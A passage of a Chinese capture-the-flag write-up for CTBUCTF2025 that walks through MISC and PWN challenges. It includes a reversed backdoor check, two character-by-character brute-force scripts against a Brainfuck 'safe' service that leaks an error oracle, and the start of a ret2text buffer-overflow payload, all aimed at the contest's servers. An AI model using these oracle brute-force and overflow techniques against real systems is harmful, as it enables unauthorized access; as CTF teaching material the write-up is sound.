ctbuctf{Welcome_to_CTBUCTF2025}<\/code><\/strong><\/p>\n\n\n\n[MISC]\u95ee\u5377\u8c03\u67e5\uff01<\/h4>\n\n\n\n
emmm\uff0c\u8fd9\u4e2a\u5c31\u7b97\u4e86\uff0c\u6211\u62ff\u8fd9\u4e2a\u51d1\u4e2a\u6570<\/p>\n\n\n\n
[MISC]Do you know SSTV?<\/h4>\n\n\n\n
\u5de5\u5177\u9898\uff0c\u865a\u62df\u673a\u641e\u4e2aQSSTV\uff0c\u9009\u9644\u4ef6\u8fd0\u884c\u5c31\u597d<\/p>\n\n\n\n
ctbuctf{N0thing_1s_impossible}<\/strong><\/p>\n\n\n\n![\"\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/figure>\n\n\n\n\uff08\u8004\u800b\u6709\u70b9\u610f\u601d\uff09<\/p>\n\n\n\n
[MISC]\u4e66\u8bfb\u4e07\u904d\u5176\u610f\u81ea\u73b0<\/h4>\n\n\n\n
\u6709\u540e\u95e8\u51fd\u6570\uff08\uff09<\/p>\n\n\n\n
\u660e\u6643\u6643\u7684backdoor<\/p>\n\n\n\n
main\u51fd\u6570\u8ddf\u8fdbsecret\u6570\u7ec4<\/p>\n\n\n\n
.data:0000000000004010 ; char secret[4]
.data:0000000000004010 secret db 'CTBU' ; DATA XREF: main:loc_1844\u2191r
.data:0000000000004010 ; main+1A4\u2191r ...
.data:0000000000004014 public key
.data:0000000000004014 ; unsigned int key
.data:0000000000004014 key dd 0DEADBEEFh ; DATA XREF: main+161\u2191r
.data:0000000000004014 ; main+1AE\u2191r ...
.data:0000000000004014 _data ends<\/code><\/pre>\n\n\n\n\u53c8\u662fkey\u53c8\u662fsecret\u7684\uff0c\u4e14main\u51fd\u6570\u770b\u5230secret\u8fd9\u4e2a\u7684\u5730\u65b9\u5c31\u8fd8\u5728\u7528\u8fd9\u4fe9\u73a9\u610f<\/p>\n\n\n\n
if ( secret[0] + key != page
|| (puts(\"what?\"), __isoc99_scanf(\"%d\", &page1), secret[1] + key != page1)
|| (puts(\"pwner??\"), __isoc99_scanf(\"%d\", &page2), secret[2] + key != page2)
|| (puts(\"so crazy!\"), __isoc99_scanf(\"%d\", &page3), secret[3] + key != page3) )<\/code><\/pre>\n\n\n\n\u7528\u811a\u60f3\u4e5f\u77e5\u9053\u591a\u534a\u6709\u4e1c\u897f\uff08\uff09<\/p>\n\n\n\n
\u6240\u4ee50DEADBEEF = 3735928559\uff1f<\/p>\n\n\n\n
\u5e76\u975e\uff0c\u56e0\u4e3akey\u5b9a\u4e49\u4e3aint\uff0c\u662f\u6709\u7b26\u53f7\u7684<\/p>\n\n\n\n
\n- \n
\nsecret<\/code> \u7684\u5143\u7d20\u662f char<\/code> \u7c7b\u578b\uff088 \u4f4d\u6709\u7b26\u53f7\u6574\u6570\uff09\uff0c\u4f46\u5728\u8fd0\u7b97\u65f6\u4f1a\u63d0\u5347\u4e3a int<\/code>\uff0832 \u4f4d\u6709\u7b26\u53f7\u6574\u6570\uff09\u3002<\/li>\n\n\n\nkey<\/code> \u662f unsigned int<\/code>\uff0c\u4f46\u5728\u4e0e int<\/code> \u76f8\u52a0\u65f6\uff0c\u4f1a\u9075\u5faa C \u8bed\u8a00\u7684\u7c7b\u578b\u8f6c\u6362\u89c4\u5219<\/strong>\uff1a\n\n- \u5982\u679c\u4e24\u4e2a\u64cd\u4f5c\u6570\u7c7b\u578b\u4e0d\u540c\uff0c\u4e14\u5176\u4e2d\u4e00\u4e2a\u4e3a
unsigned int<\/code>\uff0c\u53e6\u4e00\u4e2a\u4e3a int<\/code>\uff0c\u5219 int<\/code> \u4f1a\u88ab\u8f6c\u6362\u4e3a unsigned int<\/code><\/strong>\u3002<\/li>\n\n\n\n- \u56e0\u6b64\uff0c\u6574\u4e2a\u8868\u8fbe\u5f0f
secret[i] + key<\/code> \u7684\u8fd0\u7b97\u7ed3\u679c\u662f \u65e0\u7b26\u53f7\u6574\u6570<\/strong>\u3002<\/li>\n<\/ol>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n\u4ee5 secret[0] + key<\/code> \u4e3a\u4f8b\uff1a<\/p>\n\n\n\n\n- \u6570\u503c\u8ba1\u7b97<\/strong>\uff1asecret[0] = 67 (int) \u2192 \u8f6c\u6362\u4e3a unsigned int: 67
key = 0xDEADBEEF \u2192 unsigned int 3735928559
secret[0] + key = 67 + 3735928559 = 3735928626 (\u65e0\u7b26\u53f7\u5341\u8fdb\u5236)<\/li>\n\n\n\n- \u4e8c\u8fdb\u5236\u8868\u793a<\/strong>\uff1a\n
\n- 3735928626 \u7684\u5341\u516d\u8fdb\u5236\u4e3a
0xDEADBE66<\/code>\u3002<\/li>\n\n\n\n- \u4f46\u7a0b\u5e8f\u8981\u6c42\u8f93\u5165\u7684\u662f
int<\/code><\/strong>\uff08%d<\/code> \u683c\u5f0f\u7b26\uff09\uff0c\u56e0\u6b64\u9700\u8981\u5c06\u65e0\u7b26\u53f7\u7ed3\u679c \u89e3\u91ca\u4e3a\u6709\u7b26\u53f7\u6574\u6570<\/strong>\uff1asigned_value = 3735928626 – 2**32 = 3735928626 – 4294967296 = -559038670<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\nsecret[0] + key<\/th> 67 + 3735928559 = 3735928626<\/th> -559038670<\/th><\/tr><\/thead> secret[1] + key<\/td> 84 + 3735928559 = 3735928643<\/td> -559038653<\/td><\/tr> secret[2] + key<\/td> 66 + 3735928559 = 3735928625<\/td> -559038671<\/td><\/tr> secret[3] + key<\/td> 85 + 3735928559 = 3735928644<\/td> -559038652<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n\u73b0\u5728\u76f4\u63a5\u6309\u987a\u5e8f\u8f93\u5165\u5c31\u597d\u4e86<\/p>\n\n\n\n
\u76f4\u63a5flag ctbuctf{CAYLESsaNDdOMoRe}<\/code><\/strong><\/p>\n\n\n\n[MISC]Ez_Base64<\/h4>\n\n\n\n
emmm\uff0cpz\u4e00\u628a\u68ad\uff0c\u4f60\u503c\u5f97\u62e5\u6709<\/p>\n\n\n\n
\u6211\u7231\u5999\u5999\u5c0f\u5de5\u5177\uff08\uff09<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n[MISC]vivo50\u4fdd\u536b\u6218\uff1a\u51b3\u6218\u661f\u671f\u56db<\/h4>\n\n\n\n
\u4ea4\u4e92\u73a9\u4e24\u6b21\u611f\u89c9\u4e0d\u7b97\u590d\u6742\uff0c\u4f46\u662f\u60f3\u7740\u662f\u590f\u5e08\u5085\u538b\u7bb1\u5e95\u7684\u9898\uff0c\u6211\u8fd8\u4ee5\u4e3a\u8fd8\u6709\u4ec0\u4e48\u5947\u5947\u602a\u602a\u7684\u70b9\uff08\u6211\u4e00\u5f00\u59cb\u771f\u4ee5\u4e3a\u662fbrainfuck\u7684\u53d8\u79cd\u7f16\u7801\u4e86\uff09<\/p>\n\n\n\n
\u73a9\u4e86\u51e0\u4e2a\u5b57\u7b26\u7684bf\u7f16\u7801\u5f62\u5f0f\u8fdb\u53bb\uff0c\u611f\u89c9\u50cf\u53ef\u4ee5\u9010\u5b57\u8282\u7206\u7834<\/p>\n\n\n\n
\u76f4\u63a5\u7529\u7ed9AI\uff0c\u7136\u540e\u540e\u53f0\u8dd1\u7740\u7206\u4e86<\/p>\n\n\n\n
\u76ee\u6807\u670d\u52a1\u5668\uff1actf.ctbu.edu.cn:33326
\u4ea4\u4e92\u6548\u679c\uff1a
\u250c\u2500\u2500(kali\u327fkali)-[~]
\u2514\u2500$ nc ctf.ctbu.edu.cn 33326
\u200b
\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557
\u2551 \u2551
\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2551
\u2551 \u2588 GRANDPA'S VIVO50 SAFE \u2588 \u2551
\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2551
\u2551 \u2551
\u2551 Enter Brainfuck Code to Unlock: \u2551
\u2551 \u2551
\u2551 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2551
\u2551 \u2502 >>> \u2502 \u2551
\u2551 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2551
\u2551 \u2551
\u2551 Options: \u2551
\u2551 [ RUN BF CODE ] [ RESET ] [ HELP ] \u2551
\u2551 \u2551
\u2551 \u26a0 Reminder: Thursday is the deadline! \u2551
\u2551 \u2551
\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d
Enter the password
>> a
\u200b
Only the following Brainfuck commands are allowed: '>' '<' '+' '-' '.' ',' '[' ']' ' '
\u200b
\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557
\u2551 \u2551
\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2551
\u2551 \u2588 GRANDPA'S VIVO50 SAFE \u2588 \u2551
\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2551
\u2551 \u2551
\u2551 Enter Brainfuck Code to Unlock: \u2551
\u2551 \u2551
\u2551 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2551
\u2551 \u2502 >>> \u2502 \u2551
\u2551 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2551
\u2551 \u2551
\u2551 Options: \u2551
\u2551 [ RUN BF CODE ] [ RESET ] [ HELP ] \u2551
\u2551 \u2551
\u2551 \u26a0 Reminder: Thursday is the deadline! \u2551
\u2551 \u2551
\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d
Enter the password
>> +++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ ++.<+ +++[- >++++ <]>+. <++++ [->-- --<]> --.<+ +++[- >++++ <]>++ +.<++ ++[-> ----< ]>--. <++++ [->++ ++<]> +.<++ +[->- --<]> ----- .<
\u200b
Decrypting...
ctbuctfTraceback (most recent call last):
File \"\/app\/maker.py\", line 100, in <module>
print(password[i], end='', flush=True)
IndexError: list index out of range
\u250c\u2500\u2500(kali\u327fkali)-[~]
\u2514\u2500$ nc ctf.ctbu.edu.cn 33326
\u200b
\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557
\u2551 \u2551
\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2551
\u2551 \u2588 GRANDPA'S VIVO50 SAFE \u2588 \u2551
\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2551
\u2551 \u2551
\u2551 Enter Brainfuck Code to Unlock: \u2551
\u2551 \u2551
\u2551 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2551
\u2551 \u2502 >>> \u2502 \u2551
\u2551 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2551
\u2551 \u2551
\u2551 Options: \u2551
\u2551 [ RUN BF CODE ] [ RESET ] [ HELP ] \u2551
\u2551 \u2551
\u2551 \u26a0 Reminder: Thursday is the deadline! \u2551
\u2551 \u2551
\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d
Enter the password
>> +++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ ++.<+ +++[- >++++ <]>+. <++++ [->-- --<]> --.<+ +++[- >++++ <]>++ +.<++ ++[-> ----< ]>--. <++++ [->++ ++<]> +.<++ +[->- --<]> ----- .<+++ +[->+ +++<] >++++ +.<++ +++[- >---- -<]>- .<
\u200b
Decrypting...
ctbuctf{a
Wrong Password! Try again~
\u200b
\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557
\u2551 \u2551
\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2551
\u2551 \u2588 GRANDPA'S VIVO50 SAFE \u2588 \u2551
\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2551
\u2551 \u2551
\u2551 Enter Brainfuck Code to Unlock: \u2551
\u2551 \u2551
\u2551 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2551
\u2551 \u2502 >>> \u2502 \u2551
\u2551 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2551
\u2551 \u2551
\u2551 Options: \u2551
\u2551 [ RUN BF CODE ] [ RESET ] [ HELP ] \u2551
\u2551 \u2551
\u2551 \u26a0 Reminder: Thursday is the deadline! \u2551
\u2551 \u2551
\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d
Enter the password
>>
\u200b
\u5927\u81f4\u73a9\u6cd5\u5c31\u662f\u8fde\u4e0a\u670d\u52a1\u5668\u540e\uff0c\u8f93\u5165\u6240\u6c42flag\u5bf9\u5e94\u7684brainfuck\u7f16\u7801
\u5bf9\u4e8e\u6bcf\u6b21\u8f93\u5165\u7684\u5185\u5bb9\uff0c\u670d\u52a1\u5668\u4f1a\u4e00\u4f4d\u4e00\u4f4d\u7684\u8fdb\u884c\u6bd4\u5bf9\uff0c\u53ea\u6709\u4e0a\u4e00\u4f4dbrainfuck\u89e3\u7801\u51fa\u6765\u5bf9\u5e94\u7684\u5b57\u6bcd\u548c\u76ee\u6807\u5b57\u6bcd\u76f8\u5339\u914d\uff0c\u624d\u80fd\u5f00\u59cb\u6bd4\u5bf9\u4e0b\u4e00\u4f4d\uff0c\u5982\u679c\u6bd4\u5bf9\u6ca1\u80fd\u5bf9\u4e0a\uff0c\u4f1a\u9000\u51fa\u8fd9\u6b21\u6bd4\u5bf9\u7136\u540e\u8981\u6c42\u518d\u8f93\u5165\u4e00\u6b21password\uff0cpassword\u5373\u9700\u8981\u8f93\u5165\u7684brainfuck\u5185\u5bb9
\u73b0\u5728\uff0c\u5df2\u77e5\u76ee\u6807\u5bc6\u7801\u683c\u5f0f\uff1actbuctf{[a-z0-9]+}\uff0c\u8bf7\u5c06\u5bc6\u7801\u4f5c\u4e3aflag\u63d0\u4ea4
\u73b0\u5728\uff0c\u9010\u4f4d\u8fdb\u884c\u904d\u5386\uff0c\u53ea\u6709\u82b1\u62ec\u53f7\u91cc\u9762\u7684\u672a\u77e5\u5185\u5bb9\u9700\u8981\u904d\u5386\uff0c\u957f\u5ea6\u672a\u77e5\uff0c\u6bcf\u6b21\u904d\u5386\u8981\u6c42\u628a\u5f53\u524d\u7684\u5185\u5bb9\u8fdb\u884cbrainfuck\u7f16\u7801\u540e\uff0c\u4f20\u5165\u76ee\u6807\u670d\u52a1\u5668\uff0c\u7136\u540e\u89c2\u5bdf\u56de\u663e\uff0c\u5982\u679c\u63d0\u793awrong password\u5c31\u8ba9\u5f53\u524d\u5b57\u6bcd\u6362\u6210\u4e0b\u4e00\u4e2a\u5b57\u6bcd
\u4f8b\u5982\uff0c\u7b2c\u4e00\u6b21\u904d\u5386\u4f7f\u7528ctbuctf{a}\u8fdb\u884c\uff0c\u7ecf\u8fc7brainfuck\u7f16\u7801\u540e\uff0c\u4f20\u5165
\u5728\u670d\u52a1\u5668\u5bf9\u5b57\u6bcd\u2019a\u2018\u8fdb\u884c\u6bd4\u5bf9\u540e\uff0c\u4f1a\u629b\u51fawrong password\uff0c\u5219\u8fdb\u5165\u4e0b\u4e00\u4e2a\u5b57\u6bcd\uff0c\u4e5f\u5c31\u662fctbuctf{b}\uff0c\u76f4\u5230\u8fd9\u4e2a\u5b57\u7b26\u9a8c\u8bc1\u6b63\u786e\uff0c\u8fdb\u5165\u4e0b\u4e00\u4f4d\u5b57\u7b26\u7684\u9a8c\u8bc1
\u4f8b\u5982\uff0c\u5982\u679c\u8f93\u5165ctbuctf{x}\uff0c\u56e0\u4e3a\u4ea4\u4e92\u6548\u679c\u7684\u539f\u56e0\uff0c\u5f53\u82b1\u62ec\u53f7\u4e2d\u7684\u7b2c\u4e00\u4f4d\u5185\u5bb9\u771f\u7684\u662fx\u65f6\uff0c\u54cd\u5e94\u4e2d\u7684Decrypting...\u90e8\u5206\uff0c\u4f1a\u8f93\u51fa\u6210ctbuctf{x}\uff0c\u7136\u540e\u629b\u51fa\u9519\u8bef\uff0c\u5982\u679c\u4e0d\u662fx\uff0c\u53ea\u4f1a\u8f93\u51fa\u6210ctbuctf{x \u7136\u540e\u629b\u51fa\u9519\u8bef
\u6240\u4ee5\u73b0\u5728\u5199\u4e2a\u904d\u5386\u811a\u672c\uff0c\u7ecf\u8fc7brainfuck\u7f16\u7801\u540e\uff0c\u8fde\u63a5\u670d\u52a1\u5668\uff0c\u4f20\u5165\u540e\u9010\u5b57\u8282\u7206\u7834\uff0c\u76ee\u6807\u662f\u627e\u5230\u5bc6\u7801\uff0c\u4e5f\u5c31\u662fflag<\/code><\/pre>\n\n\n\n\u8bdd\u8bf4\u4e3a\u4ec0\u4e48\u975e\u8981\u5f04\u4e2a\u90a3\u4ec0\u4e48options\u4e0a\u53bb\uff0c\u4e00\u5f00\u59cb\u6ca1\u60f3\u73a9\u8fd9\u4e2a\u5c31\u662f\u56e0\u4e3a\u6211\u6ca1\u6cd5\u9009\u8fd9\u4e2a\u9009\u9879\uff0c\u6211\u8fd8\u5728\u60f3\u8fd9\u600e\u4e48\u73a9\uff0c\u6211\u73a9\u4e0d\u660e\u767d\uff08\uff09<\/p>\n\n\n\n
\u7ed3\u679c\u6211\u5230\u6700\u540e\u90fd\u6ca1\u7528\u4e0a\u8fd9\u4e2a\uff09<\/p>\n\n\n\n
AI\u7ed9\u51fa\u7684exp\uff1a<\/p>\n\n\n\n
import socket
\u200b
\u200b
def str_to_bf(s):
if not s:
return \"\"
code = \"\"
for c in s:
code += \">\"
code += \"+\" * ord(c)
code += \".\"
return code[1:] # \u53bb\u6389\u7b2c\u4e00\u4e2a\u591a\u4f59\u7684'>'
\u200b
\u200b
charset = 'abcdefghijklmnopqrstuvwxyz0123456789'
known_prefix = \"ctbuctf{\"
\u200b
while not known_prefix.endswith('}'):
print(f\"Current prefix: {known_prefix}\")
found = False
for c in charset:
guess = known_prefix + c
bf_code = str_to_bf(guess)
print(f\"Trying '{guess}': {bf_code[:50]}...\")
\u200b
# \u5efa\u7acb\u8fde\u63a5\u5e76\u53d1\u9001BF\u4ee3\u7801
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
s.connect(('ctf.ctbu.edu.cn', 33326))
\u200b
# \u8bfb\u53d6\u76f4\u5230\u51fa\u73b0\u8f93\u5165\u63d0\u793a\u7b26
buffer = \"\"
while True:
data = s.recv(1024).decode(errors='ignore')
if not data:
break
buffer += data
if \">> \" in buffer:
break
\u200b
# \u53d1\u9001Brainfuck\u4ee3\u7801
s.sendall(bf_code.encode() + b'\\n')
\u200b
# \u8bfb\u53d6\u54cd\u5e94
response = \"\"
while True:
data = s.recv(4096).decode(errors='ignore')
if not data:
break
response += data
s.close()
except Exception as e:
print(f\"Error: {e}\")
continue
\u200b
# \u68c0\u67e5\u662f\u5426\u51fa\u73b0IndexError
if 'IndexError' in response:
known_prefix += c
print(f\"Found correct character: '{c}'\")
found = True
break
else:
print(f\"Character '{c}' incorrect.\")
\u200b
if not found:
print(\"Failed to find next character. Exiting.\")
break
\u200b
print(f\"Flag found: {known_prefix}\")<\/code><\/pre>\n\n\n\n\u8001\u5b9e\u8bf4\uff0c\u4e00\u5f00\u59cb\u6211\u5acc\u8fd9\u4e2a\u7248\u672c\u6162\uff0c\u770b\u5230\u4e4b\u524d\u7684\u4ea4\u4e92\u6548\u679c\uff0c\u6709\u4e9b\u5947\u5947\u602a\u602a\u7684\u60f3\u6cd5\uff0c\u91cd\u65b0\u68ad\u4e86\u4e00\u4efd\u811a\u672c<\/p>\n\n\n\n
\u4f46\u662f\u8fd9\u4e2a\u66f4\u6162\uff08\u8fd8\u597d\u6211\u4e00\u5f00\u59cb\u60f3\u7684\u662f\u4e24\u4e2a\u4e00\u8d77\u8dd1\uff0c\u4e0d\u505c\u4e0d\u6539\u7b2c\u4e00\u4e2a\uff09<\/p>\n\n\n\n
\u4e0d\u8fc7\u7b2c\u4e8c\u4efd\u80fd\u4e0d\u80fd\u8dd1\u51fa\u6765\u8fd8\u771f\u4e0d\u4e00\u5b9a\uff08\uff09<\/p>\n\n\n\n
from pwn import *
import string
\u200b
context.log_level = 'error' # \u5173\u95ed\u5197\u4f59\u65e5\u5fd7
\u200b
\u200b
def generate_bf(current_guess):
# \u751f\u6210\u53ea\u8f93\u51fa\u5f53\u524d\u731c\u6d4b\u5b57\u7b26\u4e32\u7684brainfuck\u4ee3\u7801
# \u786e\u4fdd\u6bcf\u4e2a\u5b57\u7b26\u5728\u72ec\u7acbcell\u4e2d\u751f\u6210\uff0c\u907f\u514d\u6307\u9488\u5e72\u6270
bf_code = \"\"
for c in current_guess:
bf_code += \">\" # \u79fb\u52a8\u5230\u65b0cell
bf_code += \"+\" * ord(c) # \u8bbe\u7f6e\u5f53\u524dcell\u503c
bf_code += \".\" # \u8f93\u51fa\u5b57\u7b26
return bf_code[1:] # \u53bb\u6389\u7b2c\u4e00\u4e2a\u591a\u4f59\u7684>
\u200b
\u200b
known = \"ctbuctf{\"
charset = string.ascii_lowercase + string.digits
\u200b
while not known.endswith('}'):
print(f\"Current progress: {known}\")
for c in charset:
current_guess = known + c
bf = generate_bf(current_guess)
\u200b
try:
# \u6bcf\u6b21\u521b\u5efa\u65b0\u8fde\u63a5\u786e\u4fdd\u73af\u5883\u91cd\u7f6e
r = remote('ctf.ctbu.edu.cn', 33326)
\u200b
# \u8df3\u8fc7\u521d\u59cb\u63d0\u793a
r.recvuntil(b'>> ')
\u200b
# \u53d1\u9001BF\u4ee3\u7801
r.sendline(bf.encode())
\u200b
# \u83b7\u53d6\u54cd\u5e94
resp = r.recvall(timeout=2).decode()
r.close()
\u200b
# \u5173\u952e\u5224\u65ad\u903b\u8f91
if 'IndexError' in resp:
known += c
print(f\"Found: {c} => {known}\")
break
elif 'Decrypting...' in resp and known + c in resp:
known += c
print(f\"Full match found: {known}\")
break
except:
continue
else:
print(\"No valid characters found!\")
break
\u200b
print(f\"Final flag: {known}\")<\/code><\/pre>\n\n\n\nPS\uff1a\u7b2c\u4e00\u4efdexp\u68ad\u5230\u56fe\u7247\u4f4d\u7f6e\uff0c\u6211\u8fd8\u4ee5\u4e3a\u51fa\u610f\u5916\u4e86\uff0c\u5413\u5f97\u6211\u5dee\u70b9\u76f4\u63a5\u6441\u91cd\u542f\u7a0b\u5e8f\uff0c\u771f\u6441\u4e86\u6211\u4e00\u5343\u591a\u5206\u5c31\u6ca1\u4e86\uff08\uff09<\/p>\n\n\n\n
\u8fd9\u91cc\u6700\u540e\u8865\u4e2a}<\/code>\u5c31\u597d\u4e86<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n[PWN]Pwn me ! \ud83d\udca5<\/h4>\n\n\n\n
\u597d\u4e45\u6ca1\u505aret2text\u4e86\uff0c\u5361\u5728\u4e00\u4e2a\u83ab\u540d\u5176\u5999\u7684\u5730\u65b9\u5341\u591a\u5206\u949f\uff0c\u602a\u62db\u7b11\u7684\uff08\uff09<\/p>\n\n\n\n
\u55ef\u5bf9\uff0c\u5c31\u662f\u90a3\u4e2a0x40119E \uff08\uff09<\/p>\n\n\n\n
from pwn import *
context.log_level = 'debug'
p = remote(\"ctf.ctbu.edu.cn\",32999)
payload =b'a' *(64 + 8) + p64(0x40119E)
p.sendlineafter(b'me!\\n',payload)
